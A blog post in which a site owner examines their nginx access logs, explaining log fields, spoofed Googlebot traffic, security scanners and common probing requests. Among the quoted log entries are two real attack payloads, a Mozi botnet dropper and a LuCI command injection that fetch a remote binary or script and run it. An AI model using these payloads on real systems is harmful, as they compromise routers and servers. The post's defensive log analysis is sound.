Fun with server logs

Posted on May 20, 2024

Now that I have carved myself a little island on the internet, I have a server facing the public web, which of course gets hit by pretty much anything that’s out there, automated or not, malicious or not.

It’s actually quite fun to do little investigations based on what’s in the logs, as they give us a small sneak peek at what kind of traffic is going on out there in the HTTP realm.

So let’s have a look into my nginx access logs (which by default are located at /var/log/nginx/access.log). First let’s see how much is in there (as of May 20th):

$ wc -l /var/log/nginx/access.log
19307 /var/log/nginx/access.log

Wow, ok, more than 19000 requests in something like a month, when in reality only a handful of people have directly requested the web pages. That shows there’s a ton of other stuff in there1.
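If you’re curious how that volume spreads over time, the date is right there in the fourth field of each line, so a per-day tally is one awk call away (a sketch, assuming the default log format and relying on the file being chronological):

$ awk '{print substr($4, 2, 11)}' /var/log/nginx/access.log | uniq -c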

Small tangent: I haven’t plugged any analytics into my website for various reasons, but I still wanted a rough idea of how many somewhat unique hits the site gets, and I got an estimate using the following, which, quite nicely, doesn’t require anything fancy:

$ cat /var/log/nginx/access.log | grep "GET /css/fonts" | cut -d' ' -f 1 | sort | uniq | wc -l

This takes the logs, filters to keep only the requests that GET the fonts, splits each line by spaces, takes the first field (the IP address), then sorts and removes duplicates. It’s fairly accurate, I think, since it requires loading a page and then having the browser render the HTML and fetch the CSS resources, which eliminates pretty much all automated traffic from what I’ve seen. But back to the topic at hand.

First, what does it look like? Each access log line breaks down into the following items:

{ip} - - {date_time} {request} {response_code} {bytes_sent} {referrer_url} {user-agent}

If you’re wondering what these two small dashes after the IP are, the first is just formatting, and the second is supposed to be {remote_user}, but that one is effectively empty in absolutely all entries I’ve looked at.
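For reference, these fields come from nginx’s predefined combined log format, whose definition makes that literal dash before {remote_user} explicit:

log_format combined '$remote_addr - $remote_user [$time_local] '
                    '"$request" $status $body_bytes_sent '
                    '"$http_referer" "$http_user_agent"';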

The only fields that might warrant a bit of an explanation, if you’ve not stumbled upon them yet, are the {referrer_url} and the {user-agent}.

The referrer URL is just the address from which the resource was requested. It’s just an HTTP header (the famously misspelled Referer).

The User-Agent is a string which identifies the HTTP client that made the request. It can be empty, set to just the client name, such as curl/7.54.1 for the curl CLI, or it can contain a more detailed description of the system, browser, and platform, such as

Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0

There’s no guarantee that what’s put into the user-agent is actually trustworthy, as we’ll see further down.
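There’s nothing stopping a client from claiming to be whatever it wants. With curl, for example, impersonating a browser or a crawler is a single flag away:

$ curl -A "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" https://jblort.fr/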

Crawling in my ski– site

Of course we can expect the usual suspects that crawl the web in order to index it, Google being the most obvious of them.

This should be easy to spot in the logs, right? I can find multiple entries related to Google because they’re nice and advertise that it’s their bot right in the user-agent. Here’s one of them:

84.xxx.xxx.179 - - [24/Apr/2024:09:59:31 +0000] "GET /contact/ HTTP/1.1" 200 1197
"https://www.google.com/search?q=[blah]"
"Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"

A user-agent containing Googlebot/2.1, and a link to Google’s documentation about their crawler, so this makes sense, right? Except this isn’t Google.

User agents can be spoofed, and this is one example. Google actually publishes the IP ranges of its crawlers, and this one isn’t part of them. A quick check with a service like Spamhaus shows that this IP address has multiple listings in address blocklists. In this case, Spamhaus reports that

The machine using this IP is infected with malware that is emitting spam,
or is sharing a connection with an infected device.

So we got a request made to look like it came from a Google crawler when it didn’t, which is already pretty sus. And it also turns out that this IP has been listed as malicious. Now, the report continues:

Why was this IP listed?

84.xxx.xxx.179 has been classified as part of a proxy network. There is a
type of malware using this IP that installs a proxy that can be used for
nearly anything, including sending spam or stealing customer data.

So the malicious actor might not even possess the device behind this IP2, but might have compromised it and be using it to emit malicious traffic.

Alright. Here’s an entry that actually is from a Google crawler, with an IP that matches Google’s declared ranges.

66.249.66.41 - - [17/May/2024:05:38:16 +0000] "GET / HTTP/1.1" 200 2047 "-"
"Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"

Hi and sorry to disturb your little machine but…

Another entry that caught my eye was this one:

198.235.24.14 - - [16/May/2024:22:52:42 +0000] "GET / HTTP/1.1" 200 5187 "-"
"Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple
times per day to identify customers' presences on the Internet. If you would like
to be excluded from our scans, please send IP addresses/domains to:
scaninfo@paloaltonetworks.com"

Palo Alto Networks is a cybersecurity company, and Expanse is a company they acquired that specialises in attack surface management. So it looks like they’re simply scanning the web for security purposes.

In any case, I found it quite amusing to have that sort of user-agent indicating very nicely and explicitly what they’re actually doing.

It also got me thinking about how it would look if a security company or another entity were actively looking for vulnerabilities, i.e. making potentially harmful requests, in a thoughtful manner. I guess it would take a combination of saying so in the user-agent, providing a way to get in contact, and documenting which IPs will be used for it. I haven’t seen such a thing though, besides PAN’s simple and harmless GET request.

The low-hanging fruit farmers

The next category of entries is yet again about malicious actors. I expected these to show up, and even though I’m no cybersecurity expert, I still tried to configure my hosting setup simply but effectively to minimize the attack surface, including refusing pretty much any traffic that isn’t HTTPS or SSH, and using a non-default port for SSH connections. But malicious HTTPS requests will still land on my server, trying all sorts of stuff to either access things they shouldn’t, or compromise it. I don’t know about all the web frameworks and site architectures out there, but most of these attempts are pretty basic, trying to take advantage of a misconfigured or poorly secured website.
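To give an idea, that sort of policy boils down to very few rules. Here’s a sketch of the equivalent with ufw on a Linux host (not my literal setup, and 2222 below is just a placeholder for the non-default SSH port):

# Default-deny anything inbound
$ sudo ufw default deny incoming
# Only let HTTPS and SSH through (2222 is a placeholder port)
$ sudo ufw allow 443/tcp
$ sudo ufw allow 2222/tcp
$ sudo ufw enable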

This includes stuff like this:

5.xxx.xxx.69 - - [15/May/2024:22:28:18 +0000] "GET /.env HTTP/1.1" 404 564
"-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko)
Chrome/120.0.0.0 Safari/537.36"

Sorry, I don’t have any secrets for you in any publicly accessible .env file.
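Counting how many times that particular door has been tried is a one-liner:

$ grep -cF "GET /.env" /var/log/nginx/access.log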

There are also these (and a few other variants):

184.xxx.xxx.252 - - [16/May/2024:01:43:30 +0000] "GET /webui/ HTTP/1.1"
404 134 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/110.0"
---
185.xxx.xxx.145 - - [16/May/2024:22:48:12 +0000] "GET /admin/config.php HTTP/1.0"
404 162 "-" "xfa1"

which attempt to access administration interfaces that might have been left unprotected.
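These scanners are easy to spot in bulk, by the way: the response code is the ninth field, so listing which IPs rack up the most 404s takes a single pipeline:

$ awk '$9 == 404 {print $1}' /var/log/nginx/access.log | sort | uniq -c | sort -rn | head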

Or even this; thanks for kindly providing your .dll to my non-Windows server:

145.xxx.xxx.70 - - [15/May/2024:21:14:44 +0000] "POST /scripts/WPnBr.dll HTTP/1.1"
404 162 "-" "curl/7.54.0"

There’s the usual attempt at shell shenanigans directly in a GET request; please back off:

175.xxx.xxx.183 - - [16/May/2024:12:27:56 +0000]
"27;wget%20http://%s:%d/Mozi.m%20-O%20->%20/tmp/Mozi.m;chmod%20777%20/tmp/Mozi.m;
/tmp/Mozi.m%20dlink.mips%27$ HTTP/1.0" 400 166 "-" "-"

There’s also this attempt to access an OpenWrt box through its web interface, LuCI, and to execute some shell commands along the way. The decoded request looks like this:

/cgi-bin/luci/;stok=/locale?form=country&operation=write&country=
$(id>`wget+http://103.146.23.249/t+-O-+|+sh`)
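As an aside, decoding these percent-encoded requests can be done straight from the shell. A quick and dirty bash trick is to turn each % into \x and let printf expand the escapes (good enough for eyeballing log entries, not a general-purpose decoder); here it is applied to a re-encoding of the interesting part of that request:

$ urldecode() { printf '%b\n' "${1//\%/\\x}"; }
$ urldecode '%24%28id%3E%60wget+http://103.146.23.249/t+-O-+%7C+sh%60%29'
$(id>`wget+http://103.146.23.249/t+-O-+|+sh`)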

All in all, a collection of very low-sophistication attempts that rely on the fact that there are still a lot of servers and applications with blatantly open doors out there.

This could go on for a while; there’s a lot of other stuff in there, either obviously malicious or just plain confusing (a quick way to survey it in bulk follows the list):

  • There’s an actor exhaustively trying more than fifteen phpMyAdmin versions for vulnerabilities or openly accessible interfaces or scripts; congratulations on being this methodical…
  • There are a few requests that only GET the root with a curl user-agent; no idea what’s going on with those
  • There are some requests which try to GET (seemingly) completely arbitrary paths, like /zCFY, which I haven’t linked to anything yet
  • And many more…
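As promised, tallying the requested paths and sorting by count gives that bulk overview (with the default format, the path is the seventh field):

$ awk '{print $7}' /var/log/nginx/access.log | sort | uniq -c | sort -rn | head -20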

How about normal usage though?

So this was fun and all, but for the sake of completeness, here’s what it looks like when someone (hopefully human) accesses the site to check it out:

88.xxx.xxx.6 - - [07/Apr/2024:13:28:25 +0000] "GET / HTTP/1.1" 200 1574 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0"
88.xxx.xxx.6 - - [07/Apr/2024:13:28:25 +0000] "GET /js/feather.min.js HTTP/1.1" 200 68387 "https://jblort.fr/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0"
88.xxx.xxx.6 - - [07/Apr/2024:13:28:25 +0000] "GET /css/fonts.2c2227b81b1970a03e760aa2e6121cd01f87c88586803cbb282aa224720a765f.css HTTP/1.1" 200 2354 "https://jblort.fr/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0"
88.xxx.xxx.6 - - [07/Apr/2024:13:28:25 +0000] "GET /css/main.ac08a4c9714baa859217f92f051deb58df2938ec352b506df655005dcaf98cc0.css HTTP/1.1" 200 5617 "https://jblort.fr/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0"
88.xxx.xxx.6 - - [07/Apr/2024:13:28:26 +0000] "GET /fonts/roboto-mono-v12-latin-regular.woff2 HTTP/1.1" 200 12312 "https://jblort.fr/css/fonts.2c2227b81b1970a03e760aa2e6121cd01f87c88586803cbb282aa224720a765f.css" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0"
88.xxx.xxx.6 - - [07/Apr/2024:13:28:26 +0000] "GET /fonts/fira-sans-v10-latin-regular.woff2 HTTP/1.1" 200 21244 "https://jblort.fr/css/fonts.2c2227b81b1970a03e760aa2e6121cd01f87c88586803cbb282aa224720a765f.css" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0"
88.xxx.xxx.6 - - [07/Apr/2024:13:28:26 +0000] "GET /favicon.ico HTTP/1.1" 404 134 "https://jblort.fr/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0"

This collection of requests, which starts from the root and gets the handful of resources referenced by the index, is what shows up when someone types jblort.fr into a browser. Some JS, some CSS, a few fonts, plus a missing favicon, and that’s it.

Not quite as interesting as the other entries, if you ask me.


  1. And these are only the HTTPS requests that eventually reached the server. The virtual network hosting the server has in reality received way more connection attempts, on other ports, which it rightfully dropped in nearly all cases. The only other accepted traffic was my SSH sessions here and there, and my CD script deploying new versions. ↩︎

  2. This is also why I won’t post that IP in full: it probably doesn’t belong to a malicious person or org, but simply to someone whose device has been compromised. ↩︎